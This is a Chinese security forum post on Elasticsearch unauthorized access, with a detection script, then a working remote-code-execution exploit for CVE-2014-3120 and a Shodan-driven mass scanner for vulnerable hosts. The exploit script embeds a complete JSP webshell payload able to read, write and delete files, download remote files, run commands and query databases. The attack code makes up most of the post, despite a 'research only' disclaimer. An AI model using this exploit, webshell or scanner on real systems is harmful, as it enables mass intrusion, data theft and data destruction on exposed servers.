找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
热搜: 活动 交友 discuz
查看: 55|回复: 0

elasticsearch未授权漏洞判断与利用

[复制链接]

2万

主题

128

回帖

10万

积分

管理员

积分
105860
发表于 2022-5-30 11:27:16 | 显示全部楼层 |阅读模式 IP:山东省 移动/数据上网公共出口

登录后更精彩...O(∩_∩)O...

您需要 登录 才可以下载或查看,没有账号?立即注册

×
elasticsearch未授权漏洞判断与利用

一、elasticsearch介绍
Elasticsearch 是一个分布式、高扩展、高实时的搜索与数据分析引擎。它能很方便的使大量数据具有搜索、分析和探索的能力。默认端口为9200。ElasticSearch是一个基于Lucene构建的开源,分布式,RESTful搜索引擎。设计用于云计算中,能够达到实时搜索,稳定,可靠,快速,安装使用方便。支持通过HTTP使用JSON进行数据索引。Elasticsearch是一个开源的高扩展的分布式全文检索引擎,它可以近乎实时的存储、检索数据;本身扩展性很好,可以扩展到上百台服务器,处理PB级别的数据。Elasticsearch也使用Java开发并使用Lucene作为其核心来实现所有索引和搜索的功能,但是它的目的是通过简单的RESTful API来隐藏Lucene的复杂性,从而让全文搜索变得简单。


当ElasticSearch的节点启动后,它会利用多播(multicast)(或者单播,如果用户更改了配置)寻找集群中的其它节点,并与之建立连接。这个过程如下图所示:
5.png
近来,有一名黑客渗透进了大量暴露在互联网中并且没有任何密码保护的Elasticsearch服务器,并尝试删除其中存储的数据。在这名网络犯罪分子实施攻击的过程中,同时还留下了一家美国网络安全公司–夜狮安全nightlionsecurity.com的网址,试图嫁祸于夜狮安全公司。


在此次攻击活动中,攻击者很可能是在一系列自动化脚本的帮助下完成的攻击,这些脚本能够扫描互联网中暴露在外网且未受任何密码保护的ElasticSearch系统。自动化脚本扫描到这些未受保护的系统之后,便会尝试连接至其后端数据库,并尝试删除其中存储的数据,最后创建一个名为网址“nightlionsecurity.com”的新的空白索引。


ElasticSearch 是一款Java编写的企业级搜索服务,启动此服务默认会开放HTTP-9200端口,可被非法操作数据。


使用fofa搜索开放了9200端口的IP,获得1579023条数据。

任意访问一个IP,发现存在Elasticsearch未授权访问漏洞:


二、elasticsearch未授权漏洞判断
1.存在未授权漏洞样式:
访问http://ip/9200;返回字段中有“you know,for search”则代表有未授权漏洞。
6.png

#! /usr/bin/env python
# _*_  coding:utf-8 _*_
 
import requests
def Elasticsearch_check(ip, port=9200, timeout=5):
    try:
      url = "http://"+ip+":"+str(port)+"/_cat"
      response = requests.get(url) 
    except:
      pass
    if "/_cat/master" in response.content:
      print '[+] Elasticsearch Unauthorized: ' +ip+':'+str(port)
 
if __name__ == '__main__':
    Elasticsearch_check("127.0.0.1")


2.不存在未授权样式:有登录点


5.png

三、elasticsearch未授权漏洞利用
1.利用工具:ElasticSearch Head
2.工具链接:https://github.com/mobz/elasticsearch-head
     https://github.com/mobz/elasticsearch-head/blob/master/crx/es-head.crx


3.笔者使用的是Chrome插件的方式,利用成功,查看数据


7.png



检测脚本:
[Python] 纯文本查看 复制代码
[/p][p=26, null, left]#!/usr/bin/env python[/p][p=26, null, left]# by heshang [email]ha.cker@me.com[/email]
# -*- coding: utf-8 -*-
 
import httplib
import urllib,urllib2
import simplejson
import string
import sys
from optparse import OptionParser
 
print 'Elasticsearch ExpLoit By Heshang'
print '                         2014-06-23'
options = OptionParser(usage='%prog ip [port] [command]', description='elasticsearch command exec exploit(CVE-2014-3120)')
options.add_option('-p', '--port', type='int', default='9200',help='The elasticsearch port (default:9200)')
options.add_option('-c', '--cmd', type='str', default='whoami', help='command to test (default:whoami)')
options.add_option('-P', '--path',type='str', default='', help='Upload file\'s path')
 
def post(ip,port,exp):
    ip=ip
    port=port
    path=''
    exp=exp
    data = {
    "size": 1,
    "query": {
        "filtered": {
            "query": {
                "match_all": {}
            }
        }
    },
    "script_fields": {
        "exp": {
            "script": exp
        }
    }
    }
    data = simplejson.dumps(data)
    headers = {"User-agent":"Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)",
               "Accept": "ext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               "Content-Type": "application/json; charset=utf-8",
               "Connection": "keep-alive"}
    conn = httplib.HTTPConnection('%s' % ip+':'+'%d' % port)
    conn.request('POST', '/_search?source', data, headers)
    result = conn.getresponse().read()
    return result
def exec_command(ip,port,cmd):
    ip=ip
    port=port
    cmd=cmd
    exp = 'import java.util.*;\nimport java.io.*;\nString str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"'+cmd+'\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str+\"|");}sb.toString();'
    rs = post(ip,port,exp)
    return rs
def save_file(ip,port,path):
    ip=ip
    port=port
    path=path
    upload='testtesttest'
    #upload='<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%><%!String Pwd="xxxxx";String cs="UTF-8";String EC(String s)throws Exception{return new String(s.getBytes("ISO-8859-1"),cs);}Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim());if(x[1].indexOf("jdbc:oracle")!=-1){return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);}else{Connection c=DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);if(x.length>4){c.setCatalog(x[4]);}return c;}}void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i<r.length;i++){sb.append(r.toString().substring(0,2));}}void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT,sQ,sF="";java.util.Date dt;SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0; i<l.length; i++){dt=new java.util.Date(l.lastModified());sT=fm.format(dt);sQ=l.canRead()?"R":"";sQ +=l.canWrite()?" W":"";if(l.isDirectory()){sb.append(l.getName()+"/\t"+sT+"\t"+l.length()+"\t"+sQ+"\n");}else{sF+=l.getName()+"\t"+sT+"\t"+l.length()+"\t"+sQ+"\n";}}sb.append(sF);}void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();for(int k=0; k < x.length; k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}void GG(String s,String d)throws Exception{String h="0123456789ABCDEF";File f=new File(s);f.createNewFile();FileOutputStream os=new FileOutputStream(f);for(int i=0; i<d.length();i+=2){os.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d.charAt(i+1))));}os.close();}void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();for(int j=0; j<z.length; j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}void LL(String s,String d)throws Exception{URL u=new URL(s);int n=0;FileOutputStream os=new FileOutputStream(d);HttpURLConnection h=(HttpURLConnection) u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];while((n=is.read(b))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}void MM(InputStream is,StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));while((l=br.readLine())!=null){sb.append(l+"\r\n");}}void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=s.indexOf("jdbc:oracle")!=-1?c.getMetaData().getSchemas():c.getMetaData().getCatalogs();while(r.next()){sb.append(r.getString(1)+"\t");}r.close();c.close();}void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] x=s.trim().split("\r\n");ResultSet r=c.getMetaData().getTables(null,s.indexOf("jdbc:oracle")!=-1?x.length>5?x[5]:x[4]:null,"%",new String[]{"TABLE"});while(r.next()){sb.append(r.getString("TABLE_NAME")+"\t");}r.close();c.close();}void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("\r\n");Connection c=GC(s);Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[x.length-1]);ResultSetMetaData d=r.getMetaData();for(int i=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")\t");}r.close();m.close();c.close();}void QQ(String cs,String s,String q,StringBuffer sb,String p)throws Exception{Connection c=GC(s);Statement m=c.createStatement(1005,1008);BufferedWriter bw=null;try{ResultSet r=m.executeQuery(q.indexOf("--f:")!=-1?q.substring(0,q.indexOf("--f:")):q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(int i=1; i <=n; i++){sb.append(d.getColumnName(i)+"\t|\t");}sb.append("\r\n");if(q.indexOf("--f:")!=-1){File file=new File(p);if(q.indexOf("-to:")==-1){file.mkdir();}bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.indexOf("-to:")!=-1?p.trim():p+q.substring(q.indexOf("--f:")+4,q.length()).trim()),true),cs));}while(r.next()){for(int i=1; i<=n;i++){if(q.indexOf("--f:")!=-1){bw.write(r.getObject(i)+""+"\t");bw.flush();}else{sb.append(r.getObject(i)+""+"\t|\t");}}if(bw!=null){bw.newLine();}sb.append("\r\n");}r.close();if(bw!=null){bw.close();}}catch(Exception e){sb.append("Result\t|\t\r\n");try{m.executeUpdate(q);sb.append("Execute Successfully!\t|\t\r\n");}catch(Exception ee){sb.append(ee.toString()+"\t|\t\r\n");}}m.close();c.close();}%><%cs=request.getParameter("z0")!=null?request.getParameter("z0")+"":cs;response.setContentType("text/html");response.setCharacterEncoding(cs);StringBuffer sb=new StringBuffer("");try{String Z=EC(request.getParameter(Pwd)+"");String z1=EC(request.getParameter("z1")+"");String z2=EC(request.getParameter("z2")+"");sb.append("->"+"|");String s=request.getSession().getServletContext().getRealPath("/");if(Z.equals("A")){sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}}else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();}else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z2.length()):s.replaceAll("\\\\","/")+"images/");}}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString());%>'
    exp='import java.util.*;\nimport java.io.*;\nFile f = new File(\"'+path+'\");if(f.exists()){\"exists\".toString();}BufferedWriter bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f),\"UTF-8\"));bw.write(\"'+upload+'\");bw.flush();bw.close();if(f.exists()){\"success\".toString();}'
    rs = post(ip,port,exp)
    return rs
def main():
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return
    if opts.path !="" :
        exp=save_file(args[0],opts.port,opts.path)
        exp=simplejson.loads(exp)
        exp= exp['hits']['hits'][0]['fields']['exp']
        print exp
 
    elif opts.path =="":
        exp=exec_command(args[0],opts.port,opts.cmd)
        exp=simplejson.loads(exp)
        exp= exp['hits']['hits'][0]['fields']['exp']
        s='%s'% exp
        s= s.split('|')
        for i in s:
            print i#.decode("unicode_escape")
 
 
if __name__ == '__main__':
    main()


请勿用于非法用途,只供漏洞研究之用

因该脚本造成法律问题,作者概不负责,如果违反相关规定,请通知管理员删除该文章

exp:post提交 支持文件上传功能

[Python] 纯文本查看 复制代码
[/p][p=26, null, left]#!/usr/bin/env python  [/p][p=26, null, left]# -*- coding: utf-8 -*- 
#by [email]ha.cker@me.com[/email]
import time
import shodan
import sys
import urllib
import simplejson
import socket
print '******************************************************'
print '* Elasticsearch vul found Tool                       *'
print '* Write by [email]ha.cker@me.com[/email]                            *'
print '* U can use shodan api to search the vul host        *'
print '******************************************************'
# Configuration
API_KEY = ""# api
 
def check(ip):
    ip=ip
    socket.setdefaulttimeout(3)
    try:
        rs = urllib.urlopen('http://'+'%s'% ip +':9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22t%22:{%22script%22:%22Integer.toHexString(31415926)%22}}}}')
        rs = rs.read()
        rs = simplejson.loads(rs)
    except:
        pass
    try:
        for t in rs['hits']['hits'][0]['fields']['t']:
            t=t
    except:
        pass
    else:
        print 'found vul host : %s' % ip
def main():
    try:
            # Setup the api
            api = shodan.Shodan(API_KEY)
            query = 'you Know, for'
            for i in range(1,100):
                page = i
                try:
                    result = api.search(query,page)
                except Exception, e:
                    print 'Error: %s and sleep 10 s' % e
                    time.sleep(10)
                    pass
                else:
                    for service in result['matches']:
                        ip = service['ip_str']
                        ip=str(ip)
                        check(ip)
                # Loop through the matches and print each IP
                   
                        
    except Exception, e:
            print 'Error: %s and sleep 10 s' % e
            print i
            sys.exit(1)
 
if __name__ == '__main__':
    main()


check.py 需要安装shodan模块和shodan api


[Python] 纯文本查看 复制代码




参考:
1. https://blog.csdn.net/qq_45366449/article/details/115731960
2. https://blog.csdn.net/m0_67402564/article/details/124242488   
3. https://www.cnblogs.com/xiaozi/p/8275201.html

4. https://blog.csdn.net/freemindhack/article/details/37734737












回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|IOTsec-Zone|在线工具|CTF WiKi|CTF平台汇总|CTF show|ctfhub|棱角安全|rutracker|攻防世界|php手册|peiqi文库|CyberChef|猫捉鱼铃|手机版|小黑屋|cn-sec|分享屋 ( 鲁ICP备2021028754号 )

GMT+8, 2024-5-18 19:10

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表